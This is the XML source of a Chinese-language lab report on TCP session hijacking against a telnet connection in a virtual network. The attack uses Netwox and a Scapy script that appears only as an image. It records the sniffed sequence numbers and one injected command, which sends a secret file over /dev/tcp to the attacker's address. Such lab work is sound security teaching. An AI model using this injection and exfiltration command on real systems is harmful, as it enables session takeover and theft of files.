        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0268">
        <w:t>Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8718B1" w14:textId="30430F88" w:rsidR="00665726" w:rsidRDefault="00665726" w:rsidP="0066572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主机V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10.0.2.5) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和主机O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (10.0.2.6) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立好了一个telnet连接（TCP）</w:t>
      </w:r>
      <w:r w:rsidR="003C3444">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并</w:t>
      </w:r>
      <w:r w:rsidR="006463B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行了操作</w:t>
      </w:r>
      <w:r w:rsidR="003C3444">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB08B5" w14:textId="6120BB61" w:rsidR="00665726" w:rsidRDefault="003C3444" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D5F039E" wp14:editId="36E3E672">
            <wp:extent cx="5162550" cy="36480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" r="1990" b="5399"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="51625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FDFA9" w14:textId="49C8FE95" w:rsidR="00665726" w:rsidRDefault="00665726" w:rsidP="00665726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 w:rsidRPr="00B06E22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>【使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06E22">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06E22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etwox】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者A对V和O之间的此连接发起攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06247D92" w14:textId="77777777" w:rsidR="007E3363" w:rsidRDefault="00665726" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先在攻击者A上使用Wireshark监听网络流量，</w:t>
      </w:r>
      <w:r w:rsidR="001A4872">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据V</w:t>
      </w:r>
      <w:r w:rsidR="007E3363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和O上一次交互，可得</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F444A88" w14:textId="6F014CE2" w:rsidR="00665726" w:rsidRDefault="007E3363" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>port=40538</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，dport</w:t>
      </w:r>
      <w:r>
        <w:t>=23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00665726">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>seq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=2888898556，</w:t>
      </w:r>
      <w:r w:rsidR="00665726">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=2182929168</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFF5EC5" w14:textId="65820F09" w:rsidR="00665726" w:rsidRDefault="007E3363" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F7C8EB0" wp14:editId="0409A62F">
            <wp:extent cx="5762625" cy="36671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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="57626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C3212" w14:textId="7D5A6C7D" w:rsidR="00665726" w:rsidRDefault="006760E5" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>命令语句为“\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">at /home/seed/secret &gt; /dev/tcp/10.0.2.4/9090\r” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使服务器将seed的秘密文件发送给攻击者10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100E6D5" w14:textId="45A89F4C" w:rsidR="00651D05" w:rsidRDefault="007E3363" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7306DB06" wp14:editId="2226CD8F">
            <wp:extent cx="6093572" cy="5619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808" cy="5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F0DC" w14:textId="5EC649F5" w:rsidR="007E3363" w:rsidRDefault="007E3363" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78102400" w14:textId="04507062" w:rsidR="007E3363" w:rsidRDefault="007E3363" w:rsidP="00665726">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="584576AC" wp14:editId="2FAFC2F6">
            <wp:extent cx="5267325" cy="33242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5"/>
                    <a:stretch/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E3E4" w14:textId="346D22EA" w:rsidR="00665726" w:rsidRDefault="007E3363" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00694EF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的另一个终端，</w:t>
      </w:r>
      <w:r w:rsidR="00694EF7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功读取到了secret文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CE2494" w14:textId="5666D0F3" w:rsidR="00694EF7" w:rsidRDefault="007E3363" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0076BB28" wp14:editId="2B7F443E">
            <wp:extent cx="5267325" cy="8286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38"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267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D2FE" w14:textId="74F23CE2" w:rsidR="007E3363" w:rsidRDefault="007E3363" w:rsidP="00665726">
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中也可看到对应过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24469307" w14:textId="7D3B7DE4" w:rsidR="007E3363" w:rsidRDefault="007E3363" w:rsidP="0066572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05A865" wp14:editId="4381484D">
            <wp:extent cx="5781675" cy="28384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6" b="2899"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5781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86809" w14:textId="24BFF867" w:rsidR="00665726" w:rsidRDefault="00665726" w:rsidP="00665726">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B06E22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>【使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06E22">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scapy</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06E22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V和O重新建立</w:t>
      </w:r>
      <w:r w:rsidR="00B06E22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r w:rsidR="009B35A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并</w:t>
      </w:r>
      <w:r w:rsidR="00713489">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行了操作</w:t>
      </w:r>
      <w:r w:rsidR="009B35A3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1F60D" w14:textId="60878C99" w:rsidR="009B35A3" w:rsidRDefault="009B35A3" w:rsidP="009B35A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48D26E37" wp14:editId="53C25018">
            <wp:extent cx="5267325" cy="41243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9991" w14:textId="028D60F4" w:rsidR="00EA1D7B" w:rsidRDefault="00665726" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样，</w:t>
      </w:r>
      <w:r w:rsidR="00EA1D7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用Wireshark</w:t>
      </w:r>
      <w:r w:rsidR="00EA1D7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00EA1D7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据V和O上一次交互，可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C28E4" w14:textId="2B9C6C24" w:rsidR="00665726" w:rsidRDefault="00EA1D7B" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sport=40540，dport=23，</w:t>
      </w:r>
      <w:r w:rsidR="00F474E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>seq</w:t>
      </w:r>
      <w:r>
        <w:t>=3076107939</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，ack=2976711361</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7238B3AD" w14:textId="2AED5AD9" w:rsidR="00665726" w:rsidRDefault="00EA1D7B" w:rsidP="00F474E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71683962" wp14:editId="1E6873F7">
            <wp:extent cx="5876925" cy="40100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1264" w14:textId="1D73777A" w:rsidR="00EA1D7B" w:rsidRDefault="00EA1D7B" w:rsidP="00F474E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>对应代码tcp</w:t>
      </w:r>
      <w:r>
        <w:t>SeHijack.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BB415C" w14:textId="1E1AD75C" w:rsidR="00EA1D7B" w:rsidRDefault="00EA1D7B" w:rsidP="00F474E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41952850" wp14:editId="3A5ED47B">
            <wp:extent cx="5267325" cy="16478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B8CC" w14:textId="279534C4" w:rsidR="00EA1D7B" w:rsidRDefault="00EA1D7B" w:rsidP="00F474E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22160E22" w14:textId="28532322" w:rsidR="00EA1D7B" w:rsidRDefault="00EA1D7B" w:rsidP="00F474E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61EA073F" wp14:editId="77E4751F">
            <wp:extent cx="5267325" cy="21145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9018" w14:textId="792F295E" w:rsidR="00EA1D7B" w:rsidRDefault="00EA1D7B" w:rsidP="00F474E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F3E431" wp14:editId="3C5E5087">
            <wp:extent cx="5267325" cy="20859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17F6" w14:textId="519D5003" w:rsidR="00604F7A" w:rsidRDefault="00604F7A" w:rsidP="00604F7A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在攻击者A的另一个终端，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取到了secret文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152FE93" w14:textId="174C66A1" w:rsidR="00604F7A" w:rsidRPr="00604F7A" w:rsidRDefault="00604F7A" w:rsidP="00F474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9F76A0" wp14:editId="5AEED41E">
            <wp:extent cx="5267325" cy="16192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F4F4" w14:textId="3E889B09" w:rsidR="00665726" w:rsidRDefault="00665726" w:rsidP="00665726"/>
    <w:p w14:paraId="19B08F86" w14:textId="7195AC51" w:rsidR="003E780A" w:rsidRDefault="003E780A" w:rsidP="00665726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Wireshark中的对应数据包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91BDD9" w14:textId="3674FF60" w:rsidR="002F2A3F" w:rsidRPr="00665726" w:rsidRDefault="003E780A" w:rsidP="002F2A3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="259B01A1" wp14:editId="4607D031">
            <wp:extent cx="6109161" cy="3495675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37" cy="349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2A3F" w:rsidRPr="006657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C4087C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A00C20A"/>
    <w:lvl w:ilvl="0" w:tplc="31F27D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2E3D5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE823220"/>
    <w:lvl w:ilvl="0" w:tplc="1DBACE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283EAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE823220"/>
    <w:lvl w:ilvl="0" w:tplc="1DBACE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6AF"/>
    <w:rsid w:val="00000AF8"/>
    <w:rsid w:val="0005640C"/>
    <w:rsid w:val="001A4872"/>
    <w:rsid w:val="002C7828"/>
    <w:rsid w:val="002F2A3F"/>
    <w:rsid w:val="003A0012"/>
    <w:rsid w:val="003C3444"/>
    <w:rsid w:val="003E39F6"/>
    <w:rsid w:val="003E780A"/>
    <w:rsid w:val="004558F0"/>
    <w:rsid w:val="00465FC8"/>
    <w:rsid w:val="004751DD"/>
    <w:rsid w:val="004974C2"/>
    <w:rsid w:val="004B5227"/>
    <w:rsid w:val="005B0A9E"/>
    <w:rsid w:val="005C3DB0"/>
    <w:rsid w:val="005F371D"/>
    <w:rsid w:val="00604F7A"/>
    <w:rsid w:val="00614C84"/>
    <w:rsid w:val="006162D4"/>
    <w:rsid w:val="006463B0"/>
    <w:rsid w:val="00651D05"/>
    <w:rsid w:val="00665726"/>
    <w:rsid w:val="006760E5"/>
    <w:rsid w:val="00694EF7"/>
    <w:rsid w:val="00713489"/>
    <w:rsid w:val="007E3363"/>
    <w:rsid w:val="007F3FDE"/>
    <w:rsid w:val="00827D5A"/>
    <w:rsid w:val="008703D5"/>
    <w:rsid w:val="009A1108"/>
    <w:rsid w:val="009B35A3"/>
    <w:rsid w:val="009F4791"/>
    <w:rsid w:val="00A067C5"/>
    <w:rsid w:val="00A57520"/>
    <w:rsid w:val="00A654F1"/>
    <w:rsid w:val="00AA726F"/>
    <w:rsid w:val="00AF3E2D"/>
    <w:rsid w:val="00B06E22"/>
    <w:rsid w:val="00B157D1"/>
    <w:rsid w:val="00B43C02"/>
    <w:rsid w:val="00B81CB6"/>
    <w:rsid w:val="00B95370"/>
    <w:rsid w:val="00B96B15"/>
    <w:rsid w:val="00BB3E5D"/>
    <w:rsid w:val="00BF374E"/>
    <w:rsid w:val="00CF2C95"/>
    <w:rsid w:val="00D0305B"/>
    <w:rsid w:val="00D66124"/>
    <w:rsid w:val="00D81CC0"/>
    <w:rsid w:val="00DE324F"/>
    <w:rsid w:val="00E050AE"/>
    <w:rsid w:val="00E34755"/>
    <w:rsid w:val="00E3522C"/>
    <w:rsid w:val="00E736AF"/>
    <w:rsid w:val="00E96082"/>
    <w:rsid w:val="00EA1D7B"/>
    <w:rsid w:val="00EC6300"/>
    <w:rsid w:val="00EE2F30"/>
    <w:rsid w:val="00F14FFF"/>
    <w:rsid w:val="00F262FE"/>
    <w:rsid w:val="00F32F8D"/>
    <w:rsid w:val="00F37C2D"/>
    <w:rsid w:val="00F474E8"/>
    <w:rsid w:val="00F6271D"/>
    <w:rsid w:val="00F6533A"/>
    <w:rsid w:val="00FC0268"/>
    <w:rsid w:val="00FC41F8"/>
    <w:rsid w:val="00FD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EE2F8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E6ACB361-0750-4318-9A8F-976C2FCCF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36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C02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C02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C02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C026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736A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C02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C026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C026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C0268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2C782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11</Pages>
  <Words>216</Words>
  <Characters>1235</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>10</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop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67</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-12T01:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-12T12:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>